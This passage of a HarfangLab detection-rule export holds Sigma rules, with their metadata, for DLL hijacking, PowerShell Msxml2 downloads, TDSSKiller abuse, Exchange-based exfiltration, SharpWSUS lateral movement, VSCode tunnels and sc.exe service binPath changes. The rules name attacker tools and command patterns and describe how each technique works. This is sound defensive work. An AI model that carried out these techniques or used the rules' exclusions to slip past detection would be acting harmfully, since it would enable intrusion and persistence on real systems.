"content": "title: DLL Hijacking via LockAppHost.exe\nid: cee5198e-a01f-4f6e-9fe8-39acefc9b3c1\ndescription: |\n Detects potential Windows DLL Hijacking via LockAppHost.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying a legitimate executable and planting the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://securityintelligence.com/posts/windows-features-dll-sideloading/\n - https://github.com/xforcered/WFH\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2022/09/15\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'LockAppHost.exe'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded|endswith: '\\lockhostingframework.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "cee5198e-a01f-4f6e-9fe8-39acefc9b3c1",
"rule_name": "DLL Hijacking via LockAppHost.exe",
"rule_description": "Detects potential Windows DLL Hijacking via LockAppHost.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers used this technique by copying a legitimate executable and planting the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2022-09-15",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "cf01efb2-a2c9-4286-ad65-a64a2e04d787",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.603819Z",
"creation_date": "2026-03-23T11:45:34.603822Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.603830Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://csbygb.gitbook.io/pentips/post-exploitation/file-transfers",
"https://attack.mitre.org/techniques/T1048/003/",
"https://attack.mitre.org/techniques/T1105/"
],
"name": "t1105_msxml2_http_filetransfer.yml",
"content": "title: File Transfered via PowerShell Msxml2\nid: cf01efb2-a2c9-4286-ad65-a64a2e04d787\ndescription: |\n Detects PowerShell scripts using the Msxml2.XMLHTTP COM Object to downlaod files via HTTP.\n Attackers may use this COM object to transfer files or tools to the local machine or to exfiltrate data via legitimate looking commands and network traffic.\n It is recommended to investigate the downloaded files and any programs executed in the context of this alert.\nreferences:\n - https://csbygb.gitbook.io/pentips/post-exploitation/file-transfers\n - https://attack.mitre.org/techniques/T1048/003/\n - https://attack.mitre.org/techniques/T1105/\ndate: 2022/08/18\nmodified: 2025/09/17\nauthor: HarfangLab\ntags:\n - attack.execution\n - attack.t1059.001\n - attack.command_and_control\n - attack.t1105\n - attack.exfiltration\n - attack.t1048.003\n - classification.Windows.Source.PowerShellEvent\n - classification.Windows.Script.PowerShell\n - classification.Windows.Behavior.FileDownload\n - classification.Windows.Behavior.Exfiltration\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n category: powershell_event\n product: windows\ndetection:\n selection:\n PowershellCommand|contains|all:\n - 'com'\n - 'Msxml2.XMLHTTP'\n - 'open('\n ScriptNumberOfLines|lte: 50\n\n exclusion_fsecure:\n ProcessImage: '?:\\program files (x86)\\f-secure\\\\*\\wa_3rd_party_host_32.exe'\n\n exclusion_zimbra:\n PowershellCommand|contains: 'function zimbra_auth'\n\n condition: selection and not 1 of exclusion_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "cf01efb2-a2c9-4286-ad65-a64a2e04d787",
"rule_name": "File Transfered via PowerShell Msxml2",
"rule_description": "Detects PowerShell scripts using the Msxml2.XMLHTTP COM Object to downlaod files via HTTP.\nAttackers may use this COM object to transfer files or tools to the local machine or to exfiltrate data via legitimate looking commands and network traffic.\nIt is recommended to investigate the downloaded files and any programs executed in the context of this alert.\n",
"rule_creation_date": "2022-08-18",
"rule_modified_date": "2025-09-17",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.command_and_control",
"attack.execution",
"attack.exfiltration"
],
"rule_technique_tags": [
"attack.t1048.003",
"attack.t1059.001",
"attack.t1105"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "cfab5f72-5c39-43bc-a96c-5d5dd2f1e662",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.090058Z",
"creation_date": "2026-03-23T11:45:34.090060Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.090065Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows",
"https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_shutdown.yml",
"content": "title: DLL Hijacking via shutdown.exe\nid: cfab5f72-5c39-43bc-a96c-5d5dd2f1e662\ndescription: |\n Detects potential Windows DLL Hijacking via shutdown.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory and plant the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows\n - https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2021/12/10\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'shutdown.exe'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded|endswith:\n - '\\d3d10warp.dll'\n - '\\SspiCli.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "cfab5f72-5c39-43bc-a96c-5d5dd2f1e662",
"rule_name": "DLL Hijacking via shutdown.exe",
"rule_description": "Detects potential Windows DLL Hijacking via shutdown.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers used this technique by copying legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory and plant the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2021-12-10",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "cfb78c4e-68f4-425b-bc3a-c7b06c5421ce",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.627635Z",
"creation_date": "2026-03-23T11:45:34.627637Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.627641Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.sangfor.com/farsight-labs-threat-intelligence/cybersecurity/lockbit-ransomware-silently-disables-edr-using-tdsskiller",
"https://attack.mitre.org/techniques/T1562/001/"
],
"name": "t1562_001_tdsskiller.yml",
"content": "title: Execution of TDSSKiller\nid: cfb78c4e-68f4-425b-bc3a-c7b06c5421ce\ndescription: |\n Detects the execution of TDSSKiller, a free tool developed by Kaspersky for the detection and removal of rootkits.\n This tool is capable of disabling stubborn malicious processes via command prompt execution.\n LockBit 3.0 Ransomware group is already known to abuse this tool.\n It is recommended to analyze the host for past malicious activities as well as to investigate the process and user responsible for the installation of the tool to determine whether its usage is legitimate.\nreferences:\n - https://www.sangfor.com/farsight-labs-threat-intelligence/cybersecurity/lockbit-ransomware-silently-disables-edr-using-tdsskiller\n - https://attack.mitre.org/techniques/T1562/001/\ndate: 2023/07/27\nmodified: 2026/02/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.t1562.001\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.Tool.TDSSKiller\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n category: process_creation\n product: windows\ndetection:\n selection:\n - Product: 'TDSSKiller'\n - OriginalFileName: 'TDSSKiller.exe'\n - InternalName: 'TDSSKiller'\n\n # This is handled by the rule 4c0aa693-e40f-4aad-8bb5-79144acd7b68\n filter_option:\n CommandLine|contains: '-dcsvc'\n\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "cfb78c4e-68f4-425b-bc3a-c7b06c5421ce",
"rule_name": "Execution of TDSSKiller",
"rule_description": "Detects the execution of TDSSKiller, a free tool developed by Kaspersky for the detection and removal of rootkits.\nThis tool is capable of disabling stubborn malicious processes via command prompt execution.\nLockBit 3.0 Ransomware group is already known to abuse this tool.\nIt is recommended to analyze the host for past malicious activities as well as to investigate the process and user responsible for the installation of the tool to determine whether its usage is legitimate.\n",
"rule_creation_date": "2023-07-27",
"rule_modified_date": "2026-02-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion"
],
"rule_technique_tags": [
"attack.t1562.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "cfb81bd3-0386-43ec-a006-01c3b182a483",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "medium",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.083991Z",
"creation_date": "2026-03-23T11:45:34.083993Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.083997Z",
"rule_level": "medium",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.welivesecurity.com/wp-content/uploads/2019/05/ESET-LightNeuron.pdf",
"https://attack.mitre.org/techniques/T1048/"
],
"name": "t1048_exfiltration_through_mail_protocol.yml",
"content": "title: Data Possibly Exfiltrated via Microsoft Exchange Mail Protocol\nid: cfb81bd3-0386-43ec-a006-01c3b182a483\ndescription: |\n Detects the creation of suspicious files in the pickup mail folder of a Microsoft Exchange server.\n This technique can be used by attackers to exfiltrate data from an infected system by using the Exchange mail server and sending data through mail protocols.\n Turla attacker group has been known to use this technique in relation with their LightNeuron malware.\n It is recommended to analyze the process responsible for creating the EML file and to determine whether any sensitive data was exfiltrated through the Exchange server.\nreferences:\n - https://www.welivesecurity.com/wp-content/uploads/2019/05/ESET-LightNeuron.pdf\n - https://attack.mitre.org/techniques/T1048/\ndate: 2022/12/15\nmodified: 2025/02/19\nauthor: HarfangLab\ntags:\n - attack.exfiltration\n - attack.t1048\n - classification.Windows.Source.Filesystem\n - classification.Windows.Behavior.Exfiltration\nlogsource:\n product: windows\n category: filesystem_create\ndetection:\n selection:\n Path|endswith: '\\TransportRoles\\PickUp\\msg*.eml'\n\n condition: selection\nlevel: medium\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "cfb81bd3-0386-43ec-a006-01c3b182a483",
"rule_name": "Data Possibly Exfiltrated via Microsoft Exchange Mail Protocol",
"rule_description": "Detects the creation of suspicious files in the pickup mail folder of a Microsoft Exchange server.\nThis technique can be used by attackers to exfiltrate data from an infected system by using the Exchange mail server and sending data through mail protocols.\nTurla attacker group has been known to use this technique in relation with their LightNeuron malware.\nIt is recommended to analyze the process responsible for creating the EML file and to determine whether any sensitive data was exfiltrated through the Exchange server.\n",
"rule_creation_date": "2022-12-15",
"rule_modified_date": "2025-02-19",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.exfiltration"
],
"rule_technique_tags": [
"attack.t1048"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "d01d6ee0-cde6-4646-97d2-b11151bc2daf",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.076841Z",
"creation_date": "2026-03-23T11:45:34.076843Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.076847Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://github.com/nettitude/SharpWSUS",
"https://attack.mitre.org/techniques/T1210/"
],
"name": "t1210_potential_usage_of_sharpwsus.yml",
"content": "title: Possible Lateral Movement via SharpWSUS\nid: d01d6ee0-cde6-4646-97d2-b11151bc2daf\ndescription: |\n Detects the usage of the SharpWSUS tool for lateral movement using WSUS (Windows Server Update Services).\n This tool can be used to locate a WSUS server, search for clients and push malicious updates, allowing for remote execution, and therefore lateralization.\n It is recommended to investigate the context of this action to determine its legitimacy.\nreferences:\n - https://github.com/nettitude/SharpWSUS\n - https://attack.mitre.org/techniques/T1210/\ndate: 2022/10/10\nmodified: 2025/03/06\nauthor: HarfangLab\ntags:\n - attack.lateral_movement\n - attack.t1210\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.HackTool.SharpWSUS\n - classification.Windows.Behavior.Lateralization\nlogsource:\n category: process_creation\n product: windows\ndetection:\n selection_image:\n - Image|endswith: '\\SharpWSUS.exe'\n - OriginalFileName: 'SharpWSUS.exe'\n\n selection_create:\n CommandLine|contains|all:\n - ' create '\n - 'payload:'\n - 'args:'\n\n selection_approve:\n CommandLine|contains|all:\n - ' approve '\n - 'updateid:'\n - 'computername:'\n\n selection_check:\n CommandLine|contains|all:\n - ' check '\n - 'updateid:'\n - 'computername:'\n\n condition: 1 of selection_*\nlevel: high\nconfidence: strong",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "d01d6ee0-cde6-4646-97d2-b11151bc2daf",
"rule_name": "Possible Lateral Movement via SharpWSUS",
"rule_description": "Detects the usage of the SharpWSUS tool for lateral movement using WSUS (Windows Server Update Services).\nThis tool can be used to locate a WSUS server, search for clients and push malicious updates, allowing for remote execution, and therefore lateralization.\nIt is recommended to investigate the context of this action to determine its legitimacy.\n",
"rule_creation_date": "2022-10-10",
"rule_modified_date": "2025-03-06",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.lateral_movement"
],
"rule_technique_tags": [
"attack.t1210"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "d06949e6-3af6-4b5b-8b03-d0c0209f06dd",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.094317Z",
"creation_date": "2026-03-23T11:45:34.094319Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.094324Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://unit42.paloaltonetworks.com/stately-taurus-abuses-vscode-southeast-asian-espionage/",
"https://ipfyx.fr/post/visual-studio-code-tunnel/",
"https://code.visualstudio.com/docs/remote/tunnels",
"https://attack.mitre.org/techniques/T1090/"
],
"name": "t1090_macos_vscode_tunnel_commandline.yml",
"content": "title: VSCode Proxy Tunnel Started via Command-line (macOS)\nid: d06949e6-3af6-4b5b-8b03-d0c0209f06dd\ndescription: |\n Detects the VSCode binary being used with a command-line indicating a network tunnel.\n Since July 2023, Microsoft has added a feature that allows users to share their Visual Studio Desktop on the web through its own tunnel.\n This allows attackers to connect to a remote machine and potentially bypass any network counter-measures.\n It is recommended to investigate the actions performed in the shell that this tunnel spawns to determine if it is legitimate developer activity.\nreferences:\n - https://unit42.paloaltonetworks.com/stately-taurus-abuses-vscode-southeast-asian-espionage/\n - https://ipfyx.fr/post/visual-studio-code-tunnel/\n - https://code.visualstudio.com/docs/remote/tunnels\n - https://attack.mitre.org/techniques/T1090/\ndate: 2023/09/25\nmodified: 2025/04/01\nauthor: HarfangLab\ntags:\n - attack.command_and_control\n - attack.t1090\n - attack.t1572\n - attack.exfiltration\n - attack.t1567\n - classification.macOS.Source.ProcessCreation\n - classification.macOS.Behavior.Tunneling\n - classification.macOS.Behavior.CommandAndControl\nlogsource:\n category: process_creation\n product: macos\ndetection:\n selection:\n Image|endswith:\n - '/code'\n - '/codium'\n CommandLine|contains: ' tunnel'\n\n condition: selection\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "d06949e6-3af6-4b5b-8b03-d0c0209f06dd",
"rule_name": "VSCode Proxy Tunnel Started via Command-line (macOS)",
"rule_description": "Detects the VSCode binary being used with a command-line indicating a network tunnel.\nSince July 2023, Microsoft has added a feature that allows users to share their Visual Studio Desktop on the web through its own tunnel.\nThis allows attackers to connect to a remote machine and potentially bypass any network counter-measures.\nIt is recommended to investigate the actions performed in the shell that this tunnel spawns to determine if it is legitimate developer activity.\n",
"rule_creation_date": "2023-09-25",
"rule_modified_date": "2025-04-01",
"rule_os": "macos",
"rule_status": null,
"rule_tactic_tags": [
"attack.command_and_control",
"attack.exfiltration"
],
"rule_technique_tags": [
"attack.t1090",
"attack.t1567",
"attack.t1572"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "d06afd6f-9ff1-4858-8887-ff171879096a",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "medium",
"rule_effective_confidence": "moderate",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.074028Z",
"creation_date": "2026-03-23T11:45:34.074031Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.074035Z",
"rule_level": "medium",
"rule_confidence": "moderate",
"rule_confidence_override": null,
"references": [
"https://attack.mitre.org/techniques/T1543/003/",
"https://lolbas-project.github.io/lolbas/Binaries/Sc/"
],
"name": "t1543_003_modify_service_binpath.yml",
"content": "title: Service binPath Modified via sc.exe\nid: d06afd6f-9ff1-4858-8887-ff171879096a\ndescription: |\n Detects the modification of a service binPath using sc.exe.\n Adversaries can make changes to a Windows service binPath to point to a malicious payload.\n The payload is then executed the next time the service is started, achieving persistence and/or privilege escalation.\n It is recommended to investigate the parent process for suspicious activities.\nreferences:\n - https://attack.mitre.org/techniques/T1543/003/\n - https://lolbas-project.github.io/lolbas/Binaries/Sc/\ndate: 2022/11/10\nmodified: 2025/10/07\nauthor: HarfangLab\ntags:\n - attack.privilege_escalation\n - attack.persistence\n - attack.t1543.003\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.LOLBin.Sc\n - classification.Windows.Behavior.Persistence\nlogsource:\n category: process_creation\n product: windows\ndetection:\n selection:\n OriginalFileName: 'sc.exe'\n CommandLine|contains: ' config * binPath='\n\n exclusion_image:\n - ParentImage:\n - '?:\\Program Files\\EnergySaver Agent\\EnergyAgentService.exe'\n - '?:\\Program Files (x86)\\Energy Manager Agent\\EnergyAgentService.exe'\n - '?:\\Program Files\\AVOB\\Energy Saver Agent\\EnergyAgentService.exe'\n - '?:\\Program Files (x86)\\AVOB\\Energy Saver Agent\\EnergyAgentService.exe'\n - '?:\\Program Files\\Microsoft Azure Active Directory Connect\\AzureADConnect.exe'\n - '?:\\Program Files\\Microsoft Azure Active Directory Connect Upgrader\\Microsoft.Azure.ActiveDirectory.Synchronization.Upgrader.exe'\n - '?:\\Program Files (x86)\\MAXHUB\\MAXHUB PC Suite\\UPSSetupSetup.exe'\n - '?:\\Program Files (x86)\\MAXHUB\\MAXHUB PC Suite\\UdiServerSetupSetup.exe'\n - '?:\\Program Files (x86)\\Pritunl\\pritunl-service.exe'\n - '?:\\Program Files\\K2\\Setup\\SourceCode.SetupManager.exe'\n - '?:\\Program Files (x86)\\ECI DCA\\DCA.Edge.Console.exe'\n - GrandparentImage:\n - '?:\\ProgramData\\MSPEcosystem\\FileCache\\Upgrade\\Ecosystem.AgentSetup.exe'\n - '?:\\Program Files\\Ricoh\\RICOH CloudStream Client\\\\*\\cloudstreamclientcore.exe'\n - '?:\\Program Files (x86)\\Qualcomm\\QIKToolV?\\\\*\\qikv?.exe'\n - '?:\\Program Files (x86)\\PingPlotter *\\PingPlotter.exe'\n\n exclusion_ancestors:\n Ancestors|contains:\n - '|?:\\Program Files (x86)\\Lansweeper\\AutoUpdate\\Lansweeper.OnPremise.AutoUpdate.exe|'\n - '|?:\\Program Files (x86)\\Ivanti\\Workspace Control\\pfwsmgr.exe|'\n - '|?:\\Program Files\\Skyline Communications\\Skyline Taskbar Utility\\SLTaskbarUtility.exe|'\n - '|?:\\Program Files\\Octopus Deploy\\Tentacle\\Tentacle.exe|'\n - '|?:\\Program Files\\BMC Software\\BladeLogic\\RSCD\\RSCD.exe|'\n\n exclusion_brcow:\n CommandLine: '?:\\WINDOWS\\system32\\sc.exe config BrCow_* start= boot binPath= \\SYSTEMROOT\\SYSTEM32\\DRIVERS\\BrCow_*.sys'\n ParentImage: '?:\\Windows\\SysWOW64\\msiexec.exe'\n\n exclusion_cloudflare:\n CommandLine: 'sc.exe config CloudflareWARP binPath= \"?:\\Program Files\\Cloudflare\\Cloudflare WARP\\warp-svc.exe\"'\n\n exclusion_3shape:\n CommandLine: 'SC.exe CONFIG ThreeShape.DataService binPath= ?:\\Program Files\\3Shape\\3Shape Data Service\\ThreeShape.BlueWhale.DataService.exe'\n ParentImage: '?:\\Windows\\Microsoft.NET\\Framework64\\\\??.?.?????\\InstallUtil.exe'\n\n exclusion_synapse:\n CommandLine|contains: 'sc config Fuji* binPath= ?:\\Synapse\\OSD\\AdvancedReporting\\\\*.exe'\n\n condition: selection and not 1 of exclusion_*\nlevel: medium\nconfidence: moderate\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "d06afd6f-9ff1-4858-8887-ff171879096a",
"rule_name": "Service binPath Modified via sc.exe",
"rule_description": "Detects the modification of a service binPath using sc.exe.\nAdversaries can make changes to a Windows service binPath to point to a malicious payload.\nThe payload is then executed the next time the service is started, achieving persistence and/or privilege escalation.\nIt is recommended to investigate the parent process for suspicious activities.\n",
"rule_creation_date": "2022-11-10",
"rule_modified_date": "2025-10-07",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1543.003"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "d06f9bc2-420e-4291-93be-da3246c0dc81",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.073461Z",
"creation_date": "2026-03-23T11:45:34.073463Z",
"enabled": true,
